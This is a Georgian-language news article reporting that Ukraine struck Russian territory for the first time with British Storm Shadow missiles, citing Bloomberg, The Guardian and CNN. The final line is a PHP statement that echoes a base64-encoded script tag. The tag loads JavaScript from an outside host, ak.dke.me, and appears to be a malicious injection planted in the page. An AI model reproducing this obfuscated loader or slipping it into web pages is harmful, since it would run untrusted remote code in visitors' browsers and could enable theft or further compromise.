celsiusi
ავერსი საქკაბელი

უკრაინამ პირველად დაბომბა რუსული ტერიტორია ბრიტანული Storm Shadow რაკეტებით. ამის შესახებ ინფორმაციას გამოცემა Bloomberg ერთ-ერთი დასავლური ქვეყნის მაღალჩინოსანზე დაყრდნობით ავრცელებს.

გამოცემა არ აკონკრეტებს როდის და კონკრეტულად სად დაბომბა უკრაინამ სამიზნეები ბრიტანული წარმოების Storm Shadow რაკეტებით, თუმცა 20 ნოემბერს რუსული წყაროები ინფორმაციას ავრცელებდნენ, რომ უკრაინამ აღნიშნული რაკეტები კურსკის ოლქში გამოიყენა.

რუსეთის ტერიტორიაზე აღნიშნული რაკეტების პირველად გამოყენების შესახებ ინფორმაციას გამოცემა The Guardian-იც ავრცელებს, რომელმაც კურსკის ოლქიდან რაკეტის ფრაგმენტების ფოტოები გააანალიზა.

დიდი ბრიტანეთის პრემიერ-მინისტრის ადმინისტრაციაში განაცხადეს, რომ რუსეთის ტერიტორიაზე არსებული სამიზნეების წინააღმდეგ Storm Shadow რაკეტების პოტენციალური გამოყენების შესახებ ცნობებზე კომენტარს არ გააკეთებენ.

ცნობისთვის, 19 ნოემბერს ამერიკული CNN-ი ასევე ავრცელებდა ცნობებს უკრაინის მიერ ამერიკული წარმოების ATACMS რაკეტებით რუსეთის ტერიტორიის პირველად დაბომბვის შესახებ.

50
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");